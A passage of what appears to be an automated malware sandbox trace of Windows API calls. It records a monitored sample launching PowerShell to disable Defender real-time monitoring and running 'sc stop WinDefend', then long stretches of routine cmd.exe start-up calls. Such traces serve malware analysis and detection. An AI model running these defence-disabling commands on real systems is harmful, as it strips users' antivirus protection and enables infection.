	[0027.225] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="powershell  Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\2XC7u663GxWc\\Desktop", lpStartupInfo=0x2def54*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="powershell  Set-MpPreference -DisableRealtimeMonitoring $true", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2defa0 | out: lpCommandLine="powershell  Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessInformation=0x2defa0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xdd0, dwThreadId=0xdd4)) returned 1
	[0027.536] CloseHandle (hObject=0x4c) returned 1
	[0027.536] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0027.536] GetProcessHeap () returned 0xc0000
	[0027.536] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd1ef8 | out: hHeap=0xc0000) returned 1
	[0027.536] GetEnvironmentStringsW () returned 0xd1ef8*
	[0027.536] GetProcessHeap () returned 0xc0000
	[0027.537] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x98e) returned 0xd0550
	[0027.537] FreeEnvironmentStringsW (penv=0xd1ef8) returned 1
	[0027.537] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0
	[0045.049] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2dee94 | out: lpExitCode=0x2dee94*=0x1) returned 1
	[0045.049] CloseHandle (hObject=0x50) returned 1
	[0045.049] _vsnwprintf (in: _Buffer=0x2defdc, _BufferCount=0x13, _Format="%08X", _ArgList=0x2deea0 | out: _Buffer="00000001") returned 8
	[0045.050] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1
	[0045.050] GetProcessHeap () returned 0xc0000
	[0045.050] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd0550 | out: hHeap=0xc0000) returned 1
	[0045.050] GetEnvironmentStringsW () returned 0xd30b8*
	[0045.050] GetProcessHeap () returned 0xc0000
	[0045.050] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x9b4) returned 0xd0550
	[0045.050] FreeEnvironmentStringsW (penv=0xd30b8) returned 1
	[0045.050] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0045.050] GetProcessHeap () returned 0xc0000
	[0045.050] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xd0550 | out: hHeap=0xc0000) returned 1
	[0045.050] GetEnvironmentStringsW () returned 0xd30b8*
	[0045.050] GetProcessHeap () returned 0xc0000
	[0045.050] RtlAllocateHeap (HeapHandle=0xc0000, Flags=0x8, Size=0x9b4) returned 0xd0550
	[0045.050] FreeEnvironmentStringsW (penv=0xd30b8) returned 1
	[0045.050] GetProcessHeap () returned 0xc0000
	[0045.050] HeapFree (in: hHeap=0xc0000, dwFlags=0x0, lpMem=0xcd658 | out: hHeap=0xc0000) returned 1
	[0045.050] DeleteProcThreadAttributeList (in: lpAttributeList=0x2deef8 | out: lpAttributeList=0x2deef8) 
	[0045.050] _get_osfhandle (_FileHandle=1) returned 0x7
	[0045.050] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0045.051] _get_osfhandle (_FileHandle=1) returned 0x7
	[0045.051] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0741ac | out: lpMode=0x4a0741ac) returned 1
	[0045.051] _get_osfhandle (_FileHandle=0) returned 0x3
	[0045.051] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0741b0 | out: lpMode=0x4a0741b0) returned 1
	[0045.051] SetConsoleInputExeNameW () returned 0x1
	[0045.051] GetConsoleOutputCP () returned 0x1b5
	[0045.051] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a074260 | out: lpCPInfo=0x4a074260) returned 1
	[0045.051] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0045.051] exit (_Code=1) 

Process:
	id = "3"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee17460"
	os_pid = "0xd78"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xd50"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c sc stop WinDefend"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\Desktop\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 8
	os_tid = 0xd7c

	[0027.324] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af920 | out: lpSystemTimeAsFileTime=0x2af920*(dwLowDateTime=0xfcd4e440, dwHighDateTime=0x1d50a69)) 
	[0027.324] GetCurrentProcessId () returned 0xd78
	[0027.324] GetCurrentThreadId () returned 0xd7c
	[0027.324] GetTickCount () returned 0xa6012b
	[0027.324] QueryPerformanceCounter (in: lpPerformanceCount=0x2af918 | out: lpPerformanceCount=0x2af918*=10116240974) returned 1
	[0027.325] GetModuleHandleA (lpModuleName=0x0) returned 0x4a050000
	[0027.325] __set_app_type (_Type=0x1) 
	[0027.325] __p__fmode () returned 0x770231f4
	[0027.325] __p__commode () returned 0x770231fc
	[0027.326] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a0721a6) returned 0x0
	[0027.326] __getmainargs (in: _Argc=0x4a074238, _Argv=0x4a074240, _Env=0x4a07423c, _DoWildCard=0, _StartInfo=0x4a074140 | out: _Argc=0x4a074238, _Argv=0x4a074240, _Env=0x4a07423c) returned 0
	[0027.326] GetCurrentThreadId () returned 0xd7c
	[0027.326] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd7c) returned 0x38
	[0027.326] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0027.326] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0027.326] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0027.327] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0027.327] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af8b0 | out: phkResult=0x2af8b0*=0x0) returned 0x2
	[0027.327] VirtualQuery (in: lpAddress=0x2af8e7, lpBuffer=0x2af880, dwLength=0x1c | out: lpBuffer=0x2af880*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0027.327] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af880, dwLength=0x1c | out: lpBuffer=0x2af880*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0027.327] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af880, dwLength=0x1c | out: lpBuffer=0x2af880*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0027.327] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af880, dwLength=0x1c | out: lpBuffer=0x2af880*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0027.327] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af880, dwLength=0x1c | out: lpBuffer=0x2af880*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
	[0027.327] GetConsoleOutputCP () returned 0x1b5
	[0027.327] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a074260 | out: lpCPInfo=0x4a074260) returned 1
	[0027.327] SetConsoleCtrlHandler (HandlerRoutine=0x4a06e72a, Add=1) returned 1
	[0027.327] _get_osfhandle (_FileHandle=1) returned 0x7
	[0027.327] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0027.328] _get_osfhandle (_FileHandle=1) returned 0x7
	[0027.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0741ac | out: lpMode=0x4a0741ac) returned 1
	[0027.328] _get_osfhandle (_FileHandle=1) returned 0x7
	[0027.328] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0027.328] _get_osfhandle (_FileHandle=0) returned 0x3
	[0027.328] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0741b0 | out: lpMode=0x4a0741b0) returned 1
	[0027.328] _get_osfhandle (_FileHandle=0) returned 0x3
	[0027.329] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0027.329] GetEnvironmentStringsW () returned 0x4a0280*
	[0027.329] GetProcessHeap () returned 0x490000
	[0027.329] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x932) returned 0x4a0bc0
	[0027.329] FreeEnvironmentStringsW (penv=0x4a0280) returned 1
	[0027.329] GetProcessHeap () returned 0x490000
	[0027.329] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4) returned 0x4a0100
	[0027.329] GetEnvironmentStringsW () returned 0x4a0280*
	[0027.329] GetProcessHeap () returned 0x490000
	[0027.329] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x932) returned 0x4a1500
	[0027.329] FreeEnvironmentStringsW (penv=0x4a0280) returned 1
	[0027.329] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae820 | out: phkResult=0x2ae820*=0x40) returned 0x0
	[0027.329] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae828, lpData=0x2ae82c, lpcbData=0x2ae824*=0x1000 | out: lpType=0x2ae828*=0x0, lpData=0x2ae82c*=0x78, lpcbData=0x2ae824*=0x1000) returned 0x2
	[0027.329] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae828, lpData=0x2ae82c, lpcbData=0x2ae824*=0x1000 | out: lpType=0x2ae828*=0x4, lpData=0x2ae82c*=0x1, lpcbData=0x2ae824*=0x4) returned 0x0
	[0027.329] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae828, lpData=0x2ae82c, lpcbData=0x2ae824*=0x1000 | out: lpType=0x2ae828*=0x0, lpData=0x2ae82c*=0x1, lpcbData=0x2ae824*=0x1000) returned 0x2
	[0027.330] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae828, lpData=0x2ae82c, lpcbData=0x2ae824*=0x1000 | out: lpType=0x2ae828*=0x4, lpData=0x2ae82c*=0x0, lpcbData=0x2ae824*=0x4) returned 0x0
	[0027.330] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae828, lpData=0x2ae82c, lpcbData=0x2ae824*=0x1000 | out: lpType=0x2ae828*=0x4, lpData=0x2ae82c*=0x40, lpcbData=0x2ae824*=0x4) returned 0x0
	[0027.330] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae828, lpData=0x2ae82c, lpcbData=0x2ae824*=0x1000 | out: lpType=0x2ae828*=0x4, lpData=0x2ae82c*=0x40, lpcbData=0x2ae824*=0x4) returned 0x0
	[0027.330] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae828, lpData=0x2ae82c, lpcbData=0x2ae824*=0x1000 | out: lpType=0x2ae828*=0x0, lpData=0x2ae82c*=0x40, lpcbData=0x2ae824*=0x1000) returned 0x2
	[0027.330] RegCloseKey (hKey=0x40) returned 0x0
	[0027.330] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae820 | out: phkResult=0x2ae820*=0x40) returned 0x0
	[0027.330] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae828, lpData=0x2ae82c, lpcbData=0x2ae824*=0x1000 | out: lpType=0x2ae828*=0x0, lpData=0x2ae82c*=0x40, lpcbData=0x2ae824*=0x1000) returned 0x2
	[0027.330] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae828, lpData=0x2ae82c, lpcbData=0x2ae824*=0x1000 | out: lpType=0x2ae828*=0x4, lpData=0x2ae82c*=0x1, lpcbData=0x2ae824*=0x4) returned 0x0
	[0027.330] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae828, lpData=0x2ae82c, lpcbData=0x2ae824*=0x1000 | out: lpType=0x2ae828*=0x0, lpData=0x2ae82c*=0x1, lpcbData=0x2ae824*=0x1000) returned 0x2
	[0027.330] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae828, lpData=0x2ae82c, lpcbData=0x2ae824*=0x1000 | out: lpType=0x2ae828*=0x4, lpData=0x2ae82c*=0x0, lpcbData=0x2ae824*=0x4) returned 0x0
	[0027.330] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae828, lpData=0x2ae82c, lpcbData=0x2ae824*=0x1000 | out: lpType=0x2ae828*=0x4, lpData=0x2ae82c*=0x9, lpcbData=0x2ae824*=0x4) returned 0x0
	[0027.330] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae828, lpData=0x2ae82c, lpcbData=0x2ae824*=0x1000 | out: lpType=0x2ae828*=0x4, lpData=0x2ae82c*=0x9, lpcbData=0x2ae824*=0x4) returned 0x0
	[0027.330] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae828, lpData=0x2ae82c, lpcbData=0x2ae824*=0x1000 | out: lpType=0x2ae828*=0x0, lpData=0x2ae82c*=0x9, lpcbData=0x2ae824*=0x1000) returned 0x2
	[0027.330] RegCloseKey (hKey=0x40) returned 0x0
	[0027.330] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadf20
	[0027.330] srand (_Seed=0x5cdadf20) 
	[0027.330] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c sc stop WinDefend"
	[0027.330] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c sc stop WinDefend"
	[0027.331] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a075260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop") returned 0x1d
	[0027.331] GetProcessHeap () returned 0x490000
	[0027.331] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x210) returned 0x4a0280
	[0027.331] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a0288, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0027.331] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0027.331] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0027.331] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0027.331] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0027.331] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0027.331] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0027.331] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0027.331] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0027.331] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0027.331] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0027.331] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0027.331] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0027.332] GetProcessHeap () returned 0x490000
	[0027.332] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a0bc0 | out: hHeap=0x490000) returned 1
	[0027.375] GetEnvironmentStringsW () returned 0x4a0498*
	[0027.375] GetProcessHeap () returned 0x490000
	[0027.375] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x94a) returned 0x4a2798
	[0027.376] FreeEnvironmentStringsW (penv=0x4a0498) returned 1
	[0027.376] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0027.376] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a080640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0027.376] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0027.376] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0027.376] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0027.376] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0027.376] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0027.376] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0027.376] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0027.376] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0027.376] GetProcessHeap () returned 0x490000
	[0027.376] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x44) returned 0x4907f0
	[0027.376] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af5ec | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop") returned 0x1d
	[0027.376] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop", nBufferLength=0x104, lpBuffer=0x2af5ec, lpFilePart=0x2af5e8 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop", lpFilePart=0x2af5e8*="Desktop") returned 0x1d
	[0027.376] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop" (normalized: "c:\\users\\2xc7u663gxwc\\desktop")) returned 0x11
	[0027.376] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af368 | out: lpFindFileData=0x2af368*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc16c9120, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc16c9120, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4a0110
	[0027.376] FindClose (in: hFindFile=0x4a0110 | out: hFindFile=0x4a0110) returned 1
	[0027.377] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc", lpFindFileData=0x2af368 | out: lpFindFileData=0x2af368*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc16c9120, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc1c966c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc1c966c0, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XC7u663GxWc", cAlternateFileName="2XC7U6~1")) returned 0x4a0110
	[0027.377] FindClose (in: hFindFile=0x4a0110 | out: hFindFile=0x4a0110) returned 1
	[0027.377] _wcsnicmp (_String1="2XC7U6~1", _String2="2XC7u663GxWc", _MaxCount=0xc) returned 72
	[0027.377] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop", lpFindFileData=0x2af368 | out: lpFindFileData=0x2af368*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xc17153e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xfa927620, ftLastAccessTime.dwHighDateTime=0x1d50a69, ftLastWriteTime.dwLowDateTime=0xfa927620, ftLastWriteTime.dwHighDateTime=0x1d50a69, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4a0110
	[0027.377] FindClose (in: hFindFile=0x4a0110 | out: hFindFile=0x4a0110) returned 1
	[0027.377] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\Desktop" (normalized: "c:\\users\\2xc7u663gxwc\\desktop")) returned 0x11
	[0027.377] SetCurrentDirectoryW (lpPathName="C:\\Users\\2XC7u663GxWc\\Desktop" (normalized: "c:\\users\\2xc7u663gxwc\\desktop")) returned 1
	[0027.377] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\2XC7u663GxWc\\Desktop") returned 1
	[0027.377] GetProcessHeap () returned 0x490000
	[0027.377] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a2798 | out: hHeap=0x490000) returned 1
	[0027.377] GetEnvironmentStringsW () returned 0x4a0498*
	[0027.377] GetProcessHeap () returned 0x490000
	[0027.377] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x98e) returned 0x4a1e40
	[0027.378] FreeEnvironmentStringsW (penv=0x4a0498) returned 1
	[0027.378] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a075260 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\Desktop") returned 0x1d
	[0027.378] GetProcessHeap () returned 0x490000
	[0027.378] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4907f0 | out: hHeap=0x490000) returned 1
	[0027.378] GetProcessHeap () returned 0x490000
	[0027.378] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400e) returned 0x4a3a88
	[0027.378] GetProcessHeap () returned 0x490000
	[0027.378] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x30) returned 0x4a0110
	[0027.378] GetProcessHeap () returned 0x490000
	[0027.378] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a3a88 | out: hHeap=0x490000) returned 1
	[0027.378] GetConsoleOutputCP () returned 0x1b5
	[0027.379] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a074260 | out: lpCPInfo=0x4a074260) returned 1
	[0027.379] GetUserDefaultLCID () returned 0x409
	[0027.379] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a074950, cchData=8 | out: lpLCData=":") returned 2
	[0027.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af72c, cchData=128 | out: lpLCData="0") returned 2
	[0027.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af72c, cchData=128 | out: lpLCData="0") returned 2
	[0027.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af72c, cchData=128 | out: lpLCData="1") returned 2
	[0027.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a074940, cchData=8 | out: lpLCData="/") returned 2
	[0027.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a074d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0027.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a074d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0027.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a074d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0027.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a074cc0, cchData=32 | out: lpLCData="Thu") returned 4
	[0027.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a074c80, cchData=32 | out: lpLCData="Fri") returned 4
	[0027.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a074c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0027.380] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a074c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0027.380] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a074930, cchData=8 | out: lpLCData=".") returned 2
	[0027.380] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a074920, cchData=8 | out: lpLCData=",") returned 2
	[0027.380] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0027.382] GetProcessHeap () returned 0x490000
	[0027.382] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20c) returned 0x4a2810
	[0027.382] GetConsoleTitleW (in: lpConsoleTitle=0x4a2810, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0027.382] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0027.382] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0027.382] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0027.382] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0027.383] GetProcessHeap () returned 0x490000
	[0027.383] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400a) returned 0x4a3a88
	[0027.383] GetProcessHeap () returned 0x490000
	[0027.383] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4a3a88 | out: hHeap=0x490000) returned 1
	[0027.383] _wcsicmp (_String1="sc", _String2=")") returned 74
	[0027.383] _wcsicmp (_String1="FOR", _String2="sc") returned -13
	[0027.383] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13
	[0027.383] _wcsicmp (_String1="IF", _String2="sc") returned -10
	[0027.383] _wcsicmp (_String1="IF/?", _String2="sc") returned -10
	[0027.383] _wcsicmp (_String1="REM", _String2="sc") returned -1
	[0027.383] _wcsicmp (_String1="REM/?", _String2="sc") returned -1
	[0027.383] GetProcessHeap () returned 0x490000
	[0027.383] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x58) returned 0x4a2a28
	[0027.383] GetProcessHeap () returned 0x490000
	[0027.383] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xe) returned 0x49d5d8
	[0027.383] GetProcessHeap () returned 0x490000
	[0027.383] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x28) returned 0x4a2a88
	[0027.384] GetConsoleTitleW (in: lpConsoleTitle=0x2af424, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0027.384] _wcsicmp (_String1="sc", _String2="DIR") returned 15
	[0027.384] _wcsicmp (_String1="sc", _String2="ERASE") returned 14
	[0027.384] _wcsicmp (_String1="sc", _String2="DEL") returned 15
	[0027.384] _wcsicmp (_String1="sc", _String2="TYPE") returned -1
	[0027.384] _wcsicmp (_String1="sc", _String2="COPY") returned 16
	[0027.384] _wcsicmp (_String1="sc", _String2="CD") returned 16
	[0027.384] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16
	[0027.385] _wcsicmp (_String1="sc", _String2="RENAME") returned 1
	[0027.385] _wcsicmp (_String1="sc", _String2="REN") returned 1
	[0027.385] _wcsicmp (_String1="sc", _String2="ECHO") returned 14
	[0027.385] _wcsicmp (_String1="sc", _String2="SET") returned -2
